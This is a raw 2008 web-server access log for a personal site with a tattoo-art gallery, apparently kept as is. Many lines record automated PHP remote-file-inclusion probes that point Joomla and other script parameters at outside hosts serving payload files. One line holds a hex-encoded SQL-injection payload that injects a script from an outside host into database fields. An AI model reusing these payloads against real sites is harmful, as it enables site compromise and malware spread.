89.208.43.121 - - [16/Aug/2008:19:35:43 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.newshop.ru/backup/safe1.txt??? HTTP/1.1" 404 307 "-""libwww-perl/5.805"
89.208.43.121 - - [16/Aug/2008:19:35:43 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.newshop.ru/backup/safe1.txt??? HTTP/1.1" 404 302 "-""libwww-perl/5.805"
89.248.110.152 - - [16/Aug/2008:19:36:00 -0500] "GET /logs/access_log.1214438400/phphtml.php?htmlclass_path=http://www.geocities.com/himar84/id.txt?? HTTP/1.1" 404 322 "-""libwww-perl/5.805"
89.248.110.152 - - [16/Aug/2008:19:36:00 -0500] "GET /phphtml.php?htmlclass_path=http://www.geocities.com/himar84/id.txt?? HTTP/1.1" 404 295 "-""libwww-perl/5.805"
89.248.110.152 - - [16/Aug/2008:19:36:06 -0500] "GET /logs/phphtml.php?htmlclass_path=http://www.geocities.com/himar84/id.txt?? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
212.150.247.23 - - [16/Aug/2008:19:37:13 -0500] "GET //admin/frontpage_right.php?loadadminpage=http://makemoneymania.info/.../rid??? HTTP/1.1" 404 310 "-""Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)"
212.150.247.23 - - [16/Aug/2008:19:37:17 -0500] "GET /logs//admin/frontpage_right.php?loadadminpage=http://makemoneymania.info/.../rid??? HTTP/1.1" 404 315 "-""Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)"
89.208.43.121 - - [16/Aug/2008:19:37:30 -0500] "GET //newspublish/include.php?path%5Bdocroot%5D=http://www.citoyennete-active.org/mambots/content/test.txt??? HTTP/1.1" 404 308 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
89.208.43.121 - - [16/Aug/2008:19:37:30 -0500] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://www.citoyennete-active.org/mambots/content/test.txt??? HTTP/1.1" 404 313 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
89.208.43.121 - - [16/Aug/2008:19:37:32 -0500] "GET /logs/access_log.1206230400//newspublish/include.php?path%5Bdocroot%5D=http://www.newshop.ru/backup/safe1.txt??? HTTP/1.1" 404 335 "-""libwww-perl/5.805"
89.208.43.121 - - [16/Aug/2008:19:37:33 -0500] "GET //newspublish/include.php?path%5Bdocroot%5D=http://www.newshop.ru/backup/safe1.txt??? HTTP/1.1" 404 308 "-""libwww-perl/5.805"
89.208.43.121 - - [16/Aug/2008:19:37:33 -0500] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://www.newshop.ru/backup/safe1.txt??? HTTP/1.1" 404 313 "-""libwww-perl/5.805"
67.18.151.242 - - [16/Aug/2008:19:37:37 -0500] "GET /logs/access_log.1214524800/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.acoc.co.kr/acoc/board/icon/gd-bot-id.txt???? HTTP/1.1" 404 372 "-""libwww-perl/5.810"
67.18.151.242 - - [16/Aug/2008:19:37:37 -0500] "GET /components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.acoc.co.kr/acoc/board/icon/gd-bot-id.txt???? HTTP/1.1" 404 345 "-""libwww-perl/5.810"
67.18.151.242 - - [16/Aug/2008:19:37:38 -0500] "GET /logs/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.acoc.co.kr/acoc/board/icon/gd-bot-id.txt???? HTTP/1.1" 404 350 "-""libwww-perl/5.810"
67.18.151.242 - - [16/Aug/2008:19:37:38 -0500] "GET /logs/access_log.1214524800/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.acoc.co.kr/acoc/board/icon/gd-bot-id.txt???? HTTP/1.1" 404 372 "-""libwww-perl/5.810"
67.18.151.242 - - [16/Aug/2008:19:37:38 -0500] "GET /components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.acoc.co.kr/acoc/board/icon/gd-bot-id.txt???? HTTP/1.1" 404 345 "-""libwww-perl/5.810"
67.18.151.242 - - [16/Aug/2008:19:37:38 -0500] "GET /logs/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.acoc.co.kr/acoc/board/icon/gd-bot-id.txt???? HTTP/1.1" 404 350 "-""libwww-perl/5.810"
89.208.43.121 - - [16/Aug/2008:19:38:41 -0500] "GET //components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.citoyennete-active.org/mambots/content/test.txt??? HTTP/1.1" 404 325 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
89.208.43.121 - - [16/Aug/2008:19:38:41 -0500] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.citoyennete-active.org/mambots/content/test.txt??? HTTP/1.1" 404 330 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
69.210.185.1 - - [16/Aug/2008:19:39:51 -0500] "GET /logs/access_log.1214524800///vwar/backup/errors.php?error=http://www.horde-hunterz.co.uk/xoops/xoops/safe.txt?? HTTP/1.1" 404 335 "-""libwww-perl/5.805"
82.165.43.63 - - [16/Aug/2008:19:40:18 -0500] "GET /logs/access_log.1208044800/administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://502ndtactical.com/ultrastats/include/roid?? HTTP/1.1" 404 365 "-""libwww-perl/5.803"
82.165.43.63 - - [16/Aug/2008:19:40:18 -0500] "GET /administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://502ndtactical.com/ultrastats/include/roid?? HTTP/1.1" 404 338 "-""libwww-perl/5.803"
82.165.43.63 - - [16/Aug/2008:19:40:19 -0500] "GET /logs/administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://502ndtactical.com/ultrastats/include/roid?? HTTP/1.1" 404 343 "-""libwww-perl/5.803"
216.246.8.237 - - [16/Aug/2008:19:40:19 -0500] "GET /logs/access_log.1214524800/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://209.85.60.69/~forohipn/otro/clientscript/vbulletin_css/fonts.txt? HTTP/1.1" 404 372 "-""libwww-perl/5.811"
216.246.8.237 - - [16/Aug/2008:19:40:19 -0500] "GET /components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://209.85.60.69/~forohipn/otro/clientscript/vbulletin_css/fonts.txt? HTTP/1.1" 404 345 "-""libwww-perl/5.811"
216.246.8.237 - - [16/Aug/2008:19:40:19 -0500] "GET /logs/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://209.85.60.69/~forohipn/otro/clientscript/vbulletin_css/fonts.txt? HTTP/1.1" 404 350 "-""libwww-perl/5.811"
212.150.247.23 - - [16/Aug/2008:19:40:43 -0500] "GET //admin/frontpage_right.php?loadadminpage=http://makemoneymania.info/.../rid??? HTTP/1.1" 404 310 "-""Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)"
202.181.210.195 - - [16/Aug/2008:19:40:54 -0500] "GET /logs//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.79"
202.181.210.195 - - [16/Aug/2008:19:40:54 -0500] "GET //index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.79"
195.13.58.250 - - [16/Aug/2008:19:41:22 -0500] "GET /logs/access_log.1208044800/administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.plovephotography.com/plg/phpSecurePages/v6id?? HTTP/1.1" 404 365 "-""libwww-perl/5.803"
195.13.58.250 - - [16/Aug/2008:19:41:22 -0500] "GET /administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.plovephotography.com/plg/phpSecurePages/v6id?? HTTP/1.1" 404 338 "-""libwww-perl/5.803"
195.13.58.250 - - [16/Aug/2008:19:41:22 -0500] "GET /logs/administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.plovephotography.com/plg/phpSecurePages/v6id?? HTTP/1.1" 404 343 "-""libwww-perl/5.803"
89.208.43.121 - - [16/Aug/2008:19:41:41 -0500] "GET //skin/zero_vote/error.php?dir=http://www.citoyennete-active.org/mambots/content/test.txt??? HTTP/1.1" 404 309 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
89.208.43.121 - - [16/Aug/2008:19:41:41 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://www.citoyennete-active.org/mambots/content/test.txt??? HTTP/1.1" 404 314 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
89.208.43.121 - - [16/Aug/2008:19:41:53 -0500] "GET //skin/zero_vote/error.php?dir=http://www.citoyennete-active.org/mambots/content/test.txt??? HTTP/1.1" 404 309 "-""MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;"
89.208.43.121 - - [16/Aug/2008:19:41:53 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://www.citoyennete-active.org/mambots/content/test.txt??? HTTP/1.1" 404 314 "-""MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;"
69.73.189.205 - - [16/Aug/2008:19:42:11 -0500] "GET /logs//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
69.73.189.205 - - [16/Aug/2008:19:42:11 -0500] "GET //index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
58.210.80.217 - - [16/Aug/2008:19:42:23 -0500] "GET /logs/access_log.1203379200?;DeCLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D5B272B40432B275D2B2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777332E3830306D672E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272720776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777332E3830306D672E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));ExEC(@S); HTTP/1.1" 200 355700 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
89.208.43.121 - - [16/Aug/2008:19:42:29 -0500] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.newshop.ru/backup/safe1.txt??? HTTP/1.1" 404 330 "-""libwww-perl/5.805"
89.208.43.121 - - [16/Aug/2008:19:42:29 -0500] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.newshop.ru/backup/safe1.txt??? HTTP/1.1" 404 330 "-""libwww-perl/5.805"
89.208.43.121 - - [16/Aug/2008:19:42:29 -0500] "GET //components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.newshop.ru/backup/safe1.txt??? HTTP/1.1" 404 325 "-""libwww-perl/5.805"
89.208.43.121 - - [16/Aug/2008:19:42:29 -0500] "GET //components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.newshop.ru/backup/safe1.txt??? HTTP/1.1" 404 325 "-""libwww-perl/5.805"
203.160.122.193 - - [16/Aug/2008:19:42:33 -0500] "GET /tattoo/tattoo-order.htm HTTP/1.1" 200 3254 "http://images.google.co.nz/imgres?imgurl=http://tomdolan.pconline.com/tattoo/tat-cd1.jpg&imgrefurl=http://tomdolan.pconline.com/tattoo/tattoo-order.htm&h=364&w=405&sz=67&hl=en&start=29&um=1&tbnid=l48fMOZCNyJY3M:&tbnh=111&tbnw=124&prev=/images%3Fq%3D1950s%2Btattoo%2Bflash%26start%3D18%26ndsp%3D18%26um%3D1%26hl%3Den%26sa%3DN""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506)"
203.160.122.193 - - [16/Aug/2008:19:42:34 -0500] "GET /tattoo/tat6.JPG HTTP/1.1" 200 18543 "http://tomdolan.pconline.com/tattoo/tattoo-order.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506)"
203.160.122.193 - - [16/Aug/2008:19:42:34 -0500] "GET /tattoo/tat8.jpg HTTP/1.1" 200 13191 "http://tomdolan.pconline.com/tattoo/tattoo-order.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506)"
203.160.122.193 - - [16/Aug/2008:19:42:35 -0500] "GET /tattoo/msameric.JPG HTTP/1.1" 200 14283 "http://tomdolan.pconline.com/tattoo/tattoo-order.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506)"
203.160.122.193 - - [16/Aug/2008:19:42:36 -0500] "GET /tattoo/tat10.jpg HTTP/1.1" 200 22746 "http://tomdolan.pconline.com/tattoo/tattoo-order.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506)"
203.160.122.193 - - [16/Aug/2008:19:42:42 -0500] "GET /tattoo/tat-cd1.jpg HTTP/1.1" 200 67733 "http://tomdolan.pconline.com/tattoo/tattoo-order.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506)"
203.160.122.193 - - [16/Aug/2008:19:43:24 -0500] "GET /tattoo/set1.htm HTTP/1.1" 200 2676 "http://tomdolan.pconline.com/tattoo/tattoo-order.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506)"
203.160.122.193 - - [16/Aug/2008:19:43:24 -0500] "GET /tattoo/tat1.JPG HTTP/1.1" 200 16158 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506)"
203.160.122.193 - - [16/Aug/2008:19:43:25 -0500] "GET /tattoo/tat10.JPG HTTP/1.1" 200 22746 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506)"
203.160.122.193 - - [16/Aug/2008:19:43:26 -0500] "GET /tattoo/tat2.JPG HTTP/1.1" 200 18943 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506)"
203.160.122.193 - - [16/Aug/2008:19:43:27 -0500] "GET /tattoo/tat3.jpg HTTP/1.1" 200 11901 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506)"
203.160.122.193 - - [16/Aug/2008:19:43:27 -0500] "GET /tattoo/tat4.JPG HTTP/1.1" 200 18080 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506)"
203.160.122.193 - - [16/Aug/2008:19:43:28 -0500] "GET /tattoo/tat5.JPG HTTP/1.1" 200 13769 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506)"
203.160.122.193 - - [16/Aug/2008:19:43:29 -0500] "GET /tattoo/tat7.JPG HTTP/1.1" 200 17358 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506)"
203.160.122.193 - - [16/Aug/2008:19:43:29 -0500] "GET /tattoo/tat9.JPG HTTP/1.1" 200 16749 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506)"
89.208.43.121 - - [16/Aug/2008:19:43:41 -0500] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://www.newshop.ru/backup/safe1.txt??? HTTP/1.1" 404 313 "-""libwww-perl/5.805"
89.208.43.121 - - [16/Aug/2008:19:43:41 -0500] "GET //newspublish/include.php?path%5Bdocroot%5D=http://www.newshop.ru/backup/safe1.txt??? HTTP/1.1" 404 308 "-""libwww-perl/5.805"
203.160.122.193 - - [16/Aug/2008:19:44:09 -0500] "GET /tattoo/set2.htm HTTP/1.1" 200 2378 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506)"
203.160.122.193 - - [16/Aug/2008:19:44:09 -0500] "GET /tattoo/tatb1.JPG HTTP/1.1" 200 14848 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506)"
203.160.122.193 - - [16/Aug/2008:19:44:10 -0500] "GET /tattoo/tatb10.JPG HTTP/1.1" 200 17887 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506)"
203.160.122.193 - - [16/Aug/2008:19:44:11 -0500] "GET /tattoo/tatb2.JPG HTTP/1.1" 200 16592 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506)"
203.160.122.193 - - [16/Aug/2008:19:44:12 -0500] "GET /tattoo/tatb3.JPG HTTP/1.1" 200 16163 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506)"
203.160.122.193 - - [16/Aug/2008:19:44:12 -0500] "GET /tattoo/tatb4.JPG HTTP/1.1" 200 15705 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506)"
212.150.247.23 - - [16/Aug/2008:19:44:13 -0500] "GET /logs//admin/frontpage_right.php?loadadminpage=http://makemoneymania.info/.../rid??? HTTP/1.1" 404 315 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0"
212.150.247.23 - - [16/Aug/2008:19:44:13 -0500] "GET //admin/frontpage_right.php?loadadminpage=http://makemoneymania.info/.../rid??? HTTP/1.1" 404 310 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0"
203.160.122.193 - - [16/Aug/2008:19:44:14 -0500] "GET /tattoo/tatb5.JPG HTTP/1.1" 200 20135 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506)"
203.160.122.193 - - [16/Aug/2008:19:44:14 -0500] "GET /tattoo/tatb6.JPG HTTP/1.1" 200 21190 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506)"
203.160.122.193 - - [16/Aug/2008:19:44:16 -0500] "GET /tattoo/tatb7.JPG HTTP/1.1" 200 16193 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506)"
203.160.122.193 - - [16/Aug/2008:19:44:16 -0500] "GET /tattoo/tatb8.JPG HTTP/1.1" 200 18467 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506)"
203.160.122.193 - - [16/Aug/2008:19:44:18 -0500] "GET /tattoo/tatb9.JPG HTTP/1.1" 200 21598 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506)"
69.64.34.172 - - [16/Aug/2008:19:44:33 -0500] "GET /logs//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
69.64.34.172 - - [16/Aug/2008:19:44:33 -0500] "GET //index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
203.160.122.193 - - [16/Aug/2008:19:44:42 -0500] "GET /tattoo/set3.htm HTTP/1.1" 200 2177 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506)"
203.160.122.193 - - [16/Aug/2008:19:44:43 -0500] "GET /tattoo/tatc1.JPG HTTP/1.1" 200 21412 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506)"
203.160.122.193 - - [16/Aug/2008:19:44:43 -0500] "GET /tattoo/tatc10.JPG HTTP/1.1" 200 14157 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506)"
203.160.122.193 - - [16/Aug/2008:19:44:45 -0500] "GET /tattoo/tatc2.JPG HTTP/1.1" 200 17893 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506)"
203.160.122.193 - - [16/Aug/2008:19:44:45 -0500] "GET /tattoo/tatc3.JPG HTTP/1.1" 200 16313 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506)"
203.160.122.193 - - [16/Aug/2008:19:44:46 -0500] "GET /tattoo/tatc4.JPG HTTP/1.1" 200 12619 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506)"
203.160.122.193 - - [16/Aug/2008:19:44:46 -0500] "GET /tattoo/tatc8.JPG HTTP/1.1" 200 17057 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506)"
203.160.122.193 - - [16/Aug/2008:19:44:47 -0500] "GET /tattoo/tatc6.JPG HTTP/1.1" 200 14549 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506)"
203.160.122.193 - - [16/Aug/2008:19:44:47 -0500] "GET /tattoo/tatc7.JPG HTTP/1.1" 200 12347 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506)"
203.160.122.193 - - [16/Aug/2008:19:44:48 -0500] "GET /tattoo/tatc9.JPG HTTP/1.1" 200 18139 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506)"
203.160.122.193 - - [16/Aug/2008:19:44:48 -0500] "GET /tattoo/tatc5.JPG HTTP/1.1" 200 19436 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506)"
195.13.58.250 - - [16/Aug/2008:19:44:51 -0500] "GET /logs/access_log.1203379200/administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.plovephotography.com/plg/phpSecurePages/v6id?? HTTP/1.1" 404 365 "-""libwww-perl/5.803"
212.85.152.16 - - [16/Aug/2008:19:44:53 -0500] "GET /logs/home.php?act=http://www.adoradores.kit.net/alb?? HTTP/1.1" 404 297 "-""libwww-perl/5.805"
212.85.152.16 - - [16/Aug/2008:19:44:53 -0500] "GET /home.php?act=http://www.adoradores.kit.net/alb?? HTTP/1.1" 404 292 "-""libwww-perl/5.805"
203.160.122.193 - - [16/Aug/2008:19:45:01 -0500] "GET /tattoo/set4.htm HTTP/1.1" 200 1762 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506)"
203.160.122.193 - - [16/Aug/2008:19:45:02 -0500] "GET /tattoo/tatd1.JPG HTTP/1.1" 200 14507 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506)"
203.160.122.193 - - [16/Aug/2008:19:45:02 -0500] "GET /tattoo/tatd2.JPG HTTP/1.1" 200 14891 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506)"
203.160.122.193 - - [16/Aug/2008:19:45:03 -0500] "GET /tattoo/tatd3.JPG HTTP/1.1" 200 12386 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506)"
203.160.122.193 - - [16/Aug/2008:19:45:03 -0500] "GET /tattoo/tatd4.JPG HTTP/1.1" 200 12068 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506)"
203.160.122.193 - - [16/Aug/2008:19:45:03 -0500] "GET /tattoo/tatd6.JPG HTTP/1.1" 200 12059 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506)"
203.160.122.193 - - [16/Aug/2008:19:45:04 -0500] "GET /tattoo/tatd7.JPG HTTP/1.1" 200 20479 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506)"
203.160.122.193 - - [16/Aug/2008:19:45:05 -0500] "GET /tattoo/tatd10.JPG HTTP/1.1" 200 19089 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506)"
